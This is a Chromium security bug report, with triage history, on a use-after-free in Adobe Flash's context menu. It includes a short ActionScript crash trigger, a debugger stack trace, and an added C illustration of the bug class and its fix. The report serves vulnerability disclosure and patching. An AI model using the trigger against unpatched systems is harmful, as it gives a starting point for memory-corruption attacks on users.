Issue metadata
Security: Adobe Flash ContextMenu Use After Free
Reported by xiong12...@gmail.com, Jun 22 2016
Issue description
VULNERABILITY DETAILS
This is a use-after-free bug when using the ActionScript 2 context menu.
By setting a MovieClip object as the ContextMenu and freeing the object in a callback function, we can cause the MovieClip object to be reused after it is freed.
var mc = this.createEmptyMovieClip("mc", 0);
mc.onSelect = function() {
    trace(233);
    // free the MovieClip from inside its own context menu callback
    _root.removeMovieClip.call(mc);
};
_root.menu = mc;   // install the MovieClip as the context menu
VERSION
Chrome Version: 52.0.2743.41 beta-m (64-bit)
Operating System: Windows 7 en
REPRODUCTION CASE
To reproduce the case, open "TestContextMenu.swf" in chrome, then right-click the mouse to observe the crash.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
(1430.1a5c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00000000`00000000 ?? ???
0:000> k
Child-SP RetAddr Call Site
00000000`0025ccd8 000007fe`d3dade34 0x0
00000000`0025cce0 000007fe`d3db1550 pepflashplayer!PPP_ShutdownBroker+0x24c884
00000000`0025ce10 000007fe`d3db331e pepflashplayer!PPP_ShutdownBroker+0x24ffa0
00000000`0025cf30 000007fe`d3b72704 pepflashplayer!PPP_ShutdownBroker+0x251d6e
00000000`0025d030 000007fe`d3b750ce pepflashplayer!PPP_ShutdownBroker+0x11154
00000000`0025d070 000007fe`d3b6ce4b pepflashplayer!PPP_ShutdownBroker+0x13b1e
00000000`0025d320 000007fe`d3b6cf31 pepflashplayer!PPP_ShutdownBroker+0xb89b
00000000`0025d380 000007fe`d3b6c3bc pepflashplayer!PPP_ShutdownBroker+0xb981
00000000`0025d3b0 000007fe`d95e5f30 pepflashplayer!PPP_ShutdownBroker+0xae0c
00000000`0025d3e0 000007fe`d9a1afd7 chrome_child!ChromeMain+0x7015d4
00000000`0025d410 000007fe`d9a1b196 chrome_child!ChromeMain+0xb3667b
00000000`0025d510 000007fe`d95e6327 chrome_child!ChromeMain+0xb3683a
00000000`0025d560 000007fe`d95e66ea chrome_child!ChromeMain+0x7019cb
00000000`0025d590 000007fe`d7a8fa64 chrome_child!ChromeMain+0x701d8e
00000000`0025d5c0 000007fe`d7a47e0f chrome_child!GetHandleVerifier+0x49d44
00000000`0025d6b0 000007fe`d7a48db2 chrome_child!GetHandleVerifier+0x20ef
00000000`0025e9c0 000007fe`d7a91450 chrome_child!GetHandleVerifier+0x3092
00000000`0025eeb0 000007fe`d7a911ad chrome_child!GetHandleVerifier+0x4b730
00000000`0025ef10 000007fe`d7a470e1 chrome_child!GetHandleVerifier+0x4b48d
00000000`0025ef60 000007fe`d9d505e2 chrome_child!GetHandleVerifier+0x13c1
Credit:
Yuki Chen of Qihoo 360Vulcan Team
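The bug class the report describes (a callback that drops the last reference to the object its caller still holds) next to the usual defensive fix, as an added C model; it is neither Flash Player code nor the reporter's PoC, and the Clip type, its refcount and the dispatch functions are constructed for this illustration.

```c
#include <stdio.h>
#include <stdlib.h>
/* Constructed model of the bug class in the report: a host object dispatches a
 * script callback, and the callback can drop the last reference to that very
 * object. "Freed" objects are only flagged, not released, so the check is safe. */
typedef struct Clip {
    int refcount;                        /* owners currently holding the clip */
    int alive;                           /* 0 once the last reference is dropped */
    void (*on_select)(struct Clip *self);
} Clip;
static Clip *clip_retain(Clip *c) { c->refcount++; return c; }
static void clip_release(Clip *c) { if (--c->refcount == 0) c->alive = 0; }
/* Analogue of onSelect calling removeMovieClip on the clip itself. */
static void on_select_removes_self(Clip *self) { clip_release(self); }

/* Vulnerable dispatcher: relies on the script-visible owner's reference, so the
 * callback can free the clip; returns 1 if the access after the callback hit a
 * dead object (the use-after-free). */
static int dispatch_unsafe(Clip *menu) {
    menu->on_select(menu);
    return menu->alive ? 0 : 1;
}

/* Hardened dispatcher: hold an extra reference across the callback, so the clip
 * can only die after the dispatcher has finished using it. */
static int dispatch_safe(Clip *menu) {
    Clip *held = clip_retain(menu);
    held->on_select(held);
    int hit_dead = held->alive ? 0 : 1;   /* always 0: we still own a reference */
    clip_release(held);                    /* last use is above; may die here */
    return hit_dead;
}

/* Equivalent of createEmptyMovieClip + _root.menu = mc: one owning reference. */
static Clip *make_menu(void) {
    Clip *c = calloc(1, sizeof *c);
    c->refcount = 1;
    c->alive = 1;
    c->on_select = on_select_removes_self;
    return c;
}

int main(void) {
    Clip *a = make_menu(), *b = make_menu();
    printf("unsafe: %s\n", dispatch_unsafe(a) ? "use-after-free" : "ok");
    printf("safe:   %s\n", dispatch_safe(b) ? "use-after-free" : "ok");
    free(a); free(b); return 0;
}
```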
,
Jun 23 2016
Absolutely, I'll report this now!
,
Jun 23 2016
This is PSIRT-5524
,
Jun 24 2016
,
Jun 24 2016
,
Jun 24 2016
,
Jul 8 2016
natashenka: Uh oh! This issue is still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Jul 13 2016
,
Jul 13 2016
,
Jul 21 2016
,
Jul 22 2016
natashenka: Uh oh! This issue is still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Aug 2 2016
natashenka: any updates here? Thanks!
,
Aug 11 2016
,
Sep 1 2016
,
Sep 22 2016
Fixed in the September update
,
Sep 23 2016
,
Sep 23 2016
,
Sep 25 2016
,
Sep 26 2016
Your change meets the bar and is auto-approved for M54 (branch: 2840)
,
Oct 7 2016
Nothing to merge here.
,
Oct 10 2016
,
Oct 11 2016
Congratulations, the panel has awarded you $3,000 for this bug!
,
Oct 11 2016
,
Dec 30 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by dominickn@chromium.org, Jun 23 2016
Owner: natashenka@google.com
Status: Assigned (was: Unconfirmed)